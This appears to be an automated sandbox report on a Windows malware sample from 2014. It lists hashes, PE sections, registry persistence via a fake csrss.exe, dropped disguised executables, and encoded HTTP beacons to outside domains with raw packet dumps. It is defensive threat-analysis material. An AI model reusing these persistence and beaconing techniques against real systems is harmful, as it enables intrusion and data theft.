Analysis Date2014-06-20 07:57:53
MD556d5f6936adfb789d87d50ea7a923530
SHA165125431e73ffd65db5023e6e59708c6d74f4e2d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 14124c2a730b7aa04fe2ff6d0279720d sha1: 9ee103cf4326fab4ab5c3e8c8d77376dd34a0fa9 size: 167424
Section.rdata md5: 3a83c347609f22f191bc73672bd6abd8 sha1: a373fcf619177abab3a9b15757fdfe0d8c8ada9f size: 2048
Section.data md5: acf761252658a67e13e8543e50e13b59 sha1: 73ec9333502716cc1bb1af89d251665e2bf33c87 size: 23040
Section.tls md5: 0a7fd4929249e7079e2d2b9b5631e127 sha1: 7fd3ab03679385455a1f85f0a80d490b6fef903d size: 512
Timestamp2005-09-22 05:38:59
VersionPrivateBuild: 1532
PEhash2507d56a6f03457bedc7da86ce879af2d1694548
IMPhash18ca8b9bec235db32dd9f7703beb6942

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSzonekg.com
Winsock DNSpsfk.com
Winsock DNSelworldonline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSpsfk.com
Type: A
72.10.50.52
DNSzonetf.com
Type: A
208.73.210.219
DNSzonetf.com
Type: A
208.73.211.246
DNSzonetf.com
Type: A
208.73.211.235
DNSzonetf.com
Type: A
208.73.211.233
DNSzonetf.com
Type: A
208.73.211.174
DNSzonetf.com
Type: A
208.73.211.174
DNSzonetf.com
Type: A
208.73.210.219
DNSzonetf.com
Type: A
208.73.211.246
DNSzonetf.com
Type: A
208.73.211.235
DNSzonetf.com
Type: A
208.73.211.233
DNSzonekg.com
Type: A
DNSelworldonline.com
Type: A
HTTP GEThttp://psfk.com/img/icons/facebook.png?v92=47&tq=gKZEtzyszHCWAFcVgKcqlxDi0d1h2hQePd%2BvUqGH45o8I2oOZzqm%2BC%2Fb%2Bi%2F6FfYHZzl%2FQxCgAjfr4yUptH0s3wlX%2BFvhuLSVzYddh48ByQSr2BItGQkF6DdfcOtbcupREWOSvJcx2HnCsrriLUg4tDO6AEjy0RDC2zfliqJ50PG6A4lRkcQN63hwSw3tf6Iww44fikrfUxYbcvgB4wdMIp9J6aRUFyhjatDHX%2Fru%2F1FrnaB6xXv%2B%2BfLOgKawOA2kcZllqCxrbj00J%2FzE2btrGizGsI5Ijuu6eFJBB3kgRCO9pmcowC%2FZH6c5HbXlqCxuI6VkGktUKc6PxZktFVOSpuuwXNcNNFpHC%2BxVfS0Ps3hxIf0cecCdUISyFkvKy%2F7N0ZGc2JgagcrrW%2F07jfDDwOwH6p5kD4SIHV8CxRZ8PT%2FFEC
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNw1Kv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNwFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 72.10.50.52:80
Flows TCP192.168.1.1:1032 ➝ 208.73.210.219:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.174:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.174:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.174:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.174:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.174:80
Flows TCP192.168.1.1:1038 ➝ 208.73.211.174:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d67 2f69636f 6e732f66   GET /img/icons/f
0x00000010 (00016)   61636562 6f6f6b2e 706e673f 7639323d   acebook.png?v92=
0x00000020 (00032)   34372674 713d674b 5a45747a 79737a48   47&tq=gKZEtzyszH
0x00000030 (00048)   43574146 6356674b 63716c78 44693064   CWAFcVgKcqlxDi0d
0x00000040 (00064)   31683268 51655064 25324276 55714748   1h2hQePd%2BvUqGH
0x00000050 (00080)   34356f38 49326f4f 5a7a716d 25324243   45o8I2oOZzqm%2BC
0x00000060 (00096)   25324662 25324269 25324636 46665948   %2Fb%2Bi%2F6FfYH
0x00000070 (00112)   5a7a6c25 32465178 4367416a 66723479   Zzl%2FQxCgAjfr4y
0x00000080 (00128)   55707448 30733377 6c582532 42467668   UptH0s3wlX%2BFvh
0x00000090 (00144)   754c5356 7a596464 68343842 79515372   uLSVzYddh48ByQSr
0x000000a0 (00160)   32424974 47516b46 36446466 634f7462   2BItGQkF6DdfcOtb
0x000000b0 (00176)   63757052 45574f53 764a6378 32486e43   cupREWOSvJcx2HnC
0x000000c0 (00192)   73727269 4c556734 74444f36 41456a79   srriLUg4tDO6AEjy
0x000000d0 (00208)   30524443 327a666c 69714a35 30504736   0RDC2zfliqJ50PG6
0x000000e0 (00224)   41346c52 6b63514e 36336877 53773374   A4lRkcQN63hwSw3t
0x000000f0 (00240)   66364977 77343466 696b7266 55785962   f6Iww44fikrfUxYb
0x00000100 (00256)   63766742 3477644d 4970394a 36615255   cvgB4wdMIp9J6aRU
0x00000110 (00272)   4679686a 61744448 58253246 72752532   FyhjatDHX%2Fru%2
0x00000120 (00288)   46314672 6e614236 78587625 32422532   F1FrnaB6xXv%2B%2
0x00000130 (00304)   42664c4f 674b6177 4f41326b 635a6c6c   BfLOgKawOA2kcZll
0x00000140 (00320)   71437872 626a3030 4a253246 7a453262   qCxrbj00J%2FzE2b
0x00000150 (00336)   74724769 7a477349 35496a75 75366546   trGizGsI5Ijuu6eF
0x00000160 (00352)   4a424233 6b675243 4f39706d 636f7743   JBB3kgRCO9pmcowC
0x00000170 (00368)   2532465a 48366335 4862586c 71437875   %2FZH6c5HbXlqCxu
0x00000180 (00384)   4936566b 476b7455 4b633650 785a6b74   I6VkGktUKc6PxZkt
0x00000190 (00400)   46564f53 70757577 584e634e 4e467048   FVOSpuuwXNcNNFpH
0x000001a0 (00416)   43253242 78566653 30507333 68784966   C%2BxVfS0Ps3hxIf
0x000001b0 (00432)   30636563 43645549 5379466b 764b7925   0cecCdUISyFkvKy%
0x000001c0 (00448)   3246374e 305a4763 324a6761 67637272   2F7N0ZGc2Jgagcrr
0x000001d0 (00464)   57253246 30376a66 4444774f 77483670   W%2F07jfDDwOwH6p
0x000001e0 (00480)   356b4434 53494856 38437852 5a385054   5kD4SIHV8CxRZ8PT
0x000001f0 (00496)   25324646 45432048 5454502f 312e300d   %2FFEC HTTP/1.0.
0x00000200 (00512)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000210 (00528)   73650d0a 486f7374 3a207073 666b2e63   se..Host: psfk.c
0x00000220 (00544)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000230 (00560)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000240 (00576)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6b5825 32425039 68253242 49307344   JkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a49 35496a75 75366546   ose....I5Ijuu6eF
0x00000160 (00352)   4a424233 6b675243 4f39706d 636f7743   JBB3kgRCO9pmcowC
0x00000170 (00368)   2532465a 48366335 4862586c 71437875   %2FZH6c5HbXlqCxu
0x00000180 (00384)   4936566b 476b7455 4b633650 785a6b74   I6VkGktUKc6PxZkt
0x00000190 (00400)   46564f53 70757577 584e634e 4e467048   FVOSpuuwXNcNNFpH
0x000001a0 (00416)   43253242 78566653 30507333 68784966   C%2BxVfS0Ps3hxIf
0x000001b0 (00432)   30636563 43645549 5379466b 764b7925   0cecCdUISyFkvKy%
0x000001c0 (00448)   3246374e 305a4763 324a6761 67637272   2F7N0ZGc2Jgagcrr
0x000001d0 (00464)   57253246 30376a66 4444774f 77483670   W%2F07jfDDwOwH6p
0x000001e0 (00480)   356b4434 53494856 38437852 5a385054   5kD4SIHV8CxRZ8PT
0x000001f0 (00496)   25324646 45432048 5454502f 312e300d   %2FFEC HTTP/1.0.
0x00000200 (00512)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000210 (00528)   73650d0a 486f7374 3a207073 666b2e63   se..Host: psfk.c
0x00000220 (00544)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000230 (00560)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000240 (00576)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6b5825 32425039 68253242 49307344   JkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6b5825 32425039 68253242 49307344   JkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a49 35496a75 75366546   .......I5Ijuu6eF
0x00000160 (00352)   4a424233 6b675243 4f39706d 636f7743   JBB3kgRCO9pmcowC
0x00000170 (00368)   2532465a 48366335 4862586c 71437875   %2FZH6c5HbXlqCxu
0x00000180 (00384)   4936566b 476b7455 4b633650 785a6b74   I6VkGktUKc6PxZkt
0x00000190 (00400)   46564f53 70757577 584e634e 4e467048   FVOSpuuwXNcNNFpH
0x000001a0 (00416)   43253242 78566653 30507333 68784966   C%2BxVfS0Ps3hxIf
0x000001b0 (00432)   30636563 43645549 5379466b 764b7925   0cecCdUISyFkvKy%
0x000001c0 (00448)   3246374e 305a4763 324a6761 67637272   2F7N0ZGc2Jgagcrr
0x000001d0 (00464)   57253246 30376a66 4444774f 77483670   W%2F07jfDDwOwH6p
0x000001e0 (00480)   356b4434 53494856 38437852 5a385054   5kD4SIHV8CxRZ8PT
0x000001f0 (00496)   25324646 45432048 5454502f 312e300d   %2FFEC HTTP/1.0.
0x00000200 (00512)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000210 (00528)   73650d0a 486f7374 3a207073 666b2e63   se..Host: psfk.c
0x00000220 (00544)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000230 (00560)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000240 (00576)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6b5825 32425039 68253242 49307344   JkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e7731 4b763937 35586c6d   X%2BSNw1Kv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a72202f 3e0a2020   ose......r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6b5825 32425039 68253242 49307344   JkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a49 35496a75 75366546   .......I5Ijuu6eF
0x00000160 (00352)   4a424233 6b675243 4f39706d 636f7743   JBB3kgRCO9pmcowC
0x00000170 (00368)   2532465a 48366335 4862586c 71437875   %2FZH6c5HbXlqCxu
0x00000180 (00384)   4936566b 476b7455 4b633650 785a6b74   I6VkGktUKc6PxZkt
0x00000190 (00400)   46564f53 70757577 584e634e 4e467048   FVOSpuuwXNcNNFpH
0x000001a0 (00416)   43253242 78566653 30507333 68784966   C%2BxVfS0Ps3hxIf
0x000001b0 (00432)   30636563 43645549 5379466b 764b7925   0cecCdUISyFkvKy%
0x000001c0 (00448)   3246374e 305a4763 324a6761 67637272   2F7N0ZGc2Jgagcrr
0x000001d0 (00464)   57253246 30376a66 4444774f 77483670   W%2F07jfDDwOwH6p
0x000001e0 (00480)   356b4434 53494856 38437852 5a385054   5kD4SIHV8CxRZ8PT
0x000001f0 (00496)   25324646 45432048 5454502f 312e300d   %2FFEC HTTP/1.0.
0x00000200 (00512)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000210 (00528)   73650d0a 486f7374 3a207073 666b2e63   se..Host: psfk.c
0x00000220 (00544)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000230 (00560)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000240 (00576)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6b5825 32425039 68253242 49307344   JkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7746 4b763937 35586c6d   X%2BSNwFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a72202f 3e0a2020   ose......r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6b5825 32425039 68253242 49307344   JkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
